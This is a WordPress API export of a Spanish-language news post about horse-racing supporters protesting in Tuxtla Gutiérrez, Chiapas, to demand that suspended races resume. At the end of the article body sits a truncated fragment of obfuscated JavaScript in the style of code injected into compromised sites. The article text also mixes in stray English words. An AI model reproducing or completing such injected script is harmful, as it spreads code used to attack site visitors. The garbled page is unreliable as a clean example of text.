{"id":25122,"date":"2025-11-13T02:33:02","date_gmt":"2025-11-13T02:33:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25122"},"modified":"2025-11-13T02:33:03","modified_gmt":"2025-11-13T02:33:03","slug":"exigen-reanudacion-de-carreras-de-caballos-en-chiapas-sector-ofrece-acatar-regulacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25122","title":{"rendered":"Exigen reanudaci\u00f3n de carreras de caballos en Chiapas; sector ofrece acatar regulaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"25123\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434654-1024x768.jpg\" alt=\"\" class=\"wp-image-25123\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434654-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434654-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434654-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434654.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"25124\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434645-1024x768.jpg\" alt=\"\" class=\"wp-image-25124\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434645-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434645-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434645-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000434645.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>12 de noviembre del 2025. Tuxtla Guti\u00e9rrez. &#8211; Bajo un sol inclemente, decenas de integrantes del sector h\u00edpico de Chiapas se congregaron este mi\u00e9rcoles frente a palacio de gobierno para exigir la reanudaci\u00f3n de las carreras de caballos, actividad suspendida desde enero pasado.<\/p>\n\n\n\n<p>La protesta pac\u00edfica reuni\u00f3 a representantes de diversas regiones del estado, including la costa, los altos y la frailesca, mostrando el alcance regional de un sector que se encuentra en crisis por la paralizaci\u00f3n de sus actividades.<\/p>\n\n\n\n<p>Giovanni C\u00e1rcamo, narrador independiente y portavoz del movimiento, se\u00f1al\u00f3 que los llamados &#8220;carrereros&#8221; est\u00e1n dispuestos a someterse a cualquier marco regulatorio que el gobierno establezca para reactivar esta tradici\u00f3n chiapaneca. &#8220;Hemos cumplido con todas las solicitudes de informaci\u00f3n, including censos de caballos y cuadras entregados a las instancias correspondientes&#8221;, afirm\u00f3.<\/p>\n\n\n\n<p>Impacto econ\u00f3mico y compromisos<\/p>\n\n\n\n<p>El vocero destac\u00f3 el severo impacto econ\u00f3mico que la suspensi\u00f3n ha generado en numerosas familias y comercios vinculados directa e indirectamente con la industria h\u00edpica, que abarca desde criadores y entrenadores hasta proveedores de alimentos y servicios veterinarios.<\/p>\n\n\n\n<p>Frente a las preocupaciones sobre el tratamiento animal, C\u00e1rcamo fue enf\u00e1tico: &#8220;No hay maltrato animal, los caballos viven en buenas condiciones, tienen los cuidados suficientes, m\u00e9dicos veterinarios y alimentaci\u00f3n balanceada&#8221;. Reafirm\u00f3 la disposici\u00f3n del sector para colaborar en aclarar cualquier inquietud relacionada con el cuidado animal o protocolos de seguridad.<\/p>\n\n\n\n<p>Buscan di\u00e1logo con autoridades<\/p>\n\n\n\n<p>El llamado al di\u00e1logo con el gobierno estatal fue el punto central de la manifestaci\u00f3n. C\u00e1rcamo expres\u00f3 su esperanza en que &#8220;se pueda hallar una soluci\u00f3n ben\u00e9fica para todas las partes y para la econom\u00eda de la regi\u00f3n&#8221;.<\/p>\n\n\n\n<p>La movilizaci\u00f3n concluy\u00f3 de manera ordenada, con la entrega de un documento formal a las autoridades estatales donde se detallan las peticiones del sector y su disponibilidad para establecer mesas de trabajo que permitan la reactivaci\u00f3n de las carreras de caballos bajo nuevos esquemas de regulaci\u00f3n y supervisi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 12 de noviembre del 2025. Tuxtla Guti\u00e9rrez. &#8211; Bajo un sol inclemente, decenas de integrantes del sector h\u00edpico de Chiapas se congregaron este mi\u00e9rcoles frente a palacio de gobierno para exigir la reanudaci\u00f3n de las carreras de caballos, actividad suspendida desde enero pasado. La protesta pac\u00edfica reuni\u00f3 a representantes de diversas regiones del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25123,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25122","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25122"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25122\/revisions"}],"predecessor-version":[{"id":25125,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25122\/revisions\/25125"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25123"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25122"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25122"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}